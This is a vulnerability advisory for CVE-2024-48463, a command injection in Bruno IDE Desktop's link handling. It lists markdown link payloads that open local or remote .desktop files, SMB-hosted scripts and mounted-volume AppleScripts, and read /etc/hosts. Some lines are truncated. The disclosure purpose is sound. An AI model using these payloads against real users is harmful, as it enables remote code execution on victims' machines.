## https://sploitus.com/exploit?id=PACKETSTORM:188714
=====[ Tempest Security Intelligence - ADV-10/2024
Bruno IDE Desktop prior to 1.29.0
Author: Rodolfo Tavares
Tempest Security Intelligence - Recife, Pernambuco - Brazil
=====[ Table of Contents ]==================================================
Detailed Description
Timeline of Disclosure
Thanks & Acknowledgements
=====[ Vulnerability Information
Class: Improper Neutralization of Input During Web Page Generation
('Command Injection') [CWE-78]
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - 9.8
=====[ Overview ]===========================================================
System Affected: Bruno IDE Desktop
Software Version: All versions prior to 1.29.0
Vulnerability: A command injection vulnerability in the function
shell.openExternal of Bruno IDE Desktop prior to version 1.29.0 allows
attackers to execute arbitrary commands by supplying a crafted URL, leading
to potential remote code execution.
=====[ Detailed Description ]===============================================
Command Injection [PoC - Reproduction Steps]:
1. Launch Bruno IDE Desktop on any supported operating system.
2. Create a Collection and navigate to the Docs tab
3. Insert the following markdown payloads depending on the target OS:
[smb](smb://localhost/public/x.desktop) - Malicious .desktop file
[sftp](sftp://user@localhost/home/user/s.desktop) - Malicious .desktop file
POC Video: https://www.youtube.com/watch?v=SPCGVLEfVgw
If Java is installed, directly execute a malicious .jar file:
POC Video: https://www.youtube.com/watch?v=KVwKQkXA-vI
[calc](/System/Applications/Calculator.app) - Opens Calculator on macOS.
[calcFile](System/Applications/Calculator.app) - Another method to trigger
[exploit1](smb:// - Connects to a remote SMB
share and executes a script.
[exploit2](/Volumes/hello.scptd/Contents/Resources/Scripts/main.scpt) -
Executes a script from a mounted volume.
[file](///etc/hosts) - Reads the system’s /etc/hosts file.
[facetime1](facetime:+123456789) - Attempts to launch FaceTime with a
specific phone number.
[facetime2](facetime:someone@example.com) - Triggers FaceTime using an
email address.
[tel](tel:+123456789) - Initiates a phone call via the tel: protocol.
[mail](x-apple-reminder://) - Opens the Apple Reminders app via a custom
[calendar](calendar://) - Attempts to open a calendar application.
POC Video: https://www.youtube.com/watch?v=S0W93tbKaFY
4. Upon execution, the crafted URL results in arbitrary command execution
in the victim's environment.
=====[ Timeline of Disclosure
14/Set/2024 - Responsible disclosure was initiated with the vendor.
16/Set/2024 - Vendor acknowledged the vulnerability.
20/Nov/2024 - The vendor released a patch (version 1.29.1) addressing the
24/Out/2024 - CVE-2024-48463 was assigned and reserved.
=====[ Thanks & Acknowledgements ]==========================================
Tempest Security Intelligence [1]
Rodolfo Tavares - Vulnerability Discover
Filipe Xavier - Special Thanks
Henrique Arcoverde - Special Thanks
=====[ References ]=========================================================
[1] https://www.tempest.com.br
[2] https://cwe.mitre.org/data/definitions/78.html
[3] https://gist.github.com/opcod3r/ab69f36d52367df7ffac32a597dff31c
[4] https://nvd.nist.gov/vuln/detail/CVE-2024-48463
=====[ EOF ]===============================================================
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